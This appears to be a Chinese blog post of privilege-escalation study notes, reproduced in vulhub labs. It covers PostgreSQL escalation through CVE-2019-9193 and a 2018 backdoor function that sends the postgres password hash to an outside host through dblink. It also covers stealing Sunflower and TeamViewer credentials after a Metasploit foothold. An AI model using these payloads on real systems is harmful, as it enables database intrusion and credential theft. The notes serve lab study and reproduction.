web-100 提权

0x01 postgresql提权

vulhub复现,直接搜索,有两种提权,一个2018的一个2019的。2018的前提条件是需要一个数据库普通用户权限即可需要执行sql查询,然后执行sql命令留一个后门,需要等待数据库的管理员操作数据库的时候上线。2019的漏洞需要管理员权限,直接再sql语句中执行系统命令;

2018-poc

CREATE FUNCTION public.array_to_string(anyarray,text) RETURNS TEXT AS $$
    select dblink_connect((select 'hostaddr=10.0.0.1 port=5433 user=postgres password=chybeta sslmode=disable dbname='||(SELECT passwd FROM pg_shadow WHERE usename='postgres'))); 
    SELECT pg_catalog.array_to_string($1,$2);
$$ LANGUAGE SQL VOLATILE;

2019-poc

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

vulhub靶场复现步骤

https://vulhub.org/#/environments/postgres/CVE-2019-9193/
0x02 第三方提权

讲了cs上线后使用插件抓取向日葵或者是tv这种远控工具的识别码和密码进行远程的登录,相当于直接提权到本地用户了;

向日葵

向日葵抓取密文解密工具,使用python38运行

https://github.com/wafinfo/Sunflower_get_Password

teamviewer

步骤:生成msf后门,运行后门上线,运行teamviewer抓取密码的模块

模块名称为

run post/windows/gather/credentials/temviewer_passwords
0x03 redis
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值